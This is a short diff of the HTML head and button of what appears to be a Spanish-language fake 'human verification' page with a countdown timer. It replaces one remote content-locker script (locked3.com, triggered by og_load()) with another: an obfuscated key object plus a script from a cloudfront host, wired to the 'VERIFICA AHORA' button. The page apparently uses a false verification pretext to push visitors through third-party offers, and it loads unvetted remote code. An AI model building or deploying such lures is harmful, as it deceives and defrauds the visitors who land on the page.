--- a/index.html
+++ b/index.html
@@ -15,7 +15,10 @@
 		<link href="css/animate.css" rel="stylesheet">
 		<link href="css/magnific-popup.css" rel="stylesheet">
 		<link href="css/style.css" rel="stylesheet">
-		<script type="text/javascript" id="ogjs" src="https://locked3.com/cl/js/pog5q2"></script>
+		<script type="text/javascript">
+    var gyusX_EMe_aUWyQc={"it":4211788,"key":"00fad"};
+</script>
+<script src="https://d3h83s39ga3y3t.cloudfront.net/17cc700.js"></script>
 		<script src="js/1eab076.js"></script>
 	</head>
 	<body>
@@ -37,7 +40,7 @@
 						<span id="human_verification_timer_time"><span>30 minutes and 00 seconds</span></span>
 					</div>
 					<div class="verification-button-wrapper">
-						<a <button="" onclick=og_load(); class="button">VERIFICA AHORA</a>
+						<a <button="" onclick="_Ut()" class="button">VERIFICA AHORA</a>
 					</div>
 				</div>
 			</div>
